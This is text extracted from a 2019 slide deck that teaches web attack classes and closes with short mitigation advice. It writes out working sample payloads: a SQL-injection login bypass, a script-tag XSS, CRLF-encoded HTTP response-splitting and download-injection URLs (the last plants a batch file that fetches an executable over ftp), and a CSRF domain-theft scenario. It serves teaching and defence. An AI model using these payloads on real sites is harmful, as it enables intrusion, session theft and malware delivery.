Trendy Web Security

  • November 2019
  • PDF

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  • Words: 373
  • Pages: 38
Trendy Web Security

A Review of times past

SQL Injection

password ' OR 1=1; --

Parses as: SELECT username FROM users WHERE username = 'username' and password = '' OR 1=1

And you're in...

Cross Site Scripting (XSS)

About-Me field I enjoy long walks on the beach, and <script src="">

Now, you have your code running in another guy's browser

Have your code change his linksys' DNS settings?

SQL Injections and XSS attacks are old news.

What's new(er)?

Click Jacking

A Demo...

No JS Needed!

Cross Site Request Forgery

You are now logged out of google.

Or... had your domain stolen

• CSRF Creates a new Gmail Filter which forwards certain emails

• Hacker sends an email forwarded to your host, asking for a transfer + unlock

• Hacker transfers your domain away.

HTTP Response Splitting

/redir_lang.jsp?lang=English /redir_lang.jsp?lang=foobar%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/ 1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d %0aShazam

HTTP/1.1 302 Moved Temporarily Date: Wed, 24 Dec 2003 15:26:41 GMT Location: Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 Shazam Server: WebLogic XMLX Module 8.1 SP1 Fri Jun 20 23:06:40 PDT 2003 271009 with Content-Type: text/html Set-Cookie: JSESSIONID=1pwxbgHwzeaIIFyaksxqsq92Z0VULcQUcAanfK7In7IyrCST9Us S!-1251019693; path=/ Connection: Close 302 Moved Temporarily

This document you requested has moved temporarily.

It's now at ang=foobar Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 19 <html>Shazam</html>.

Why? • Cache Poisoning • Replace content • Phishing • XSS • etc.

File Download Injection

An similar idea to response splitting

We've all written download scripts: download.php?file=report.xls

$filename = basename($_GET["download"]); header('Content-Disposition: attachment; filename="' . $filename . '"'); readfile(basename($_GET["download"])); return;

http://[trusted_domain]/download.php?file=attack.bat%0d %0a%0d%0aecho%20get%20/pub/winzip/wzinet95.exe|ftp%20-A

HTTP/1.1 200 OK Date: Thu, 27 Mar 2008 05:02:24 GMT Server: Apache Path=/download Content-Disposition: attachment;filename=attack.bat Content-length: 88 echo get /pub/winzip/wzinet95.exe|ftp -A awzinet95.exe Content-Length: 0 Content-Type: application/octet-stream;charset=euc-kr

It's a dangerous world...

How about some Mitigation

As a user Sensitive stuff in separate browser?

As a programmer: Whitelist everything. Nothing gets through w/o you knowing

As a programmer: GET vs. POST. Use them correctly.

Download Injection: Use the real file name, and not the http argument

ClickJacking NoScript has a "Forbid iframe" feature

Links •

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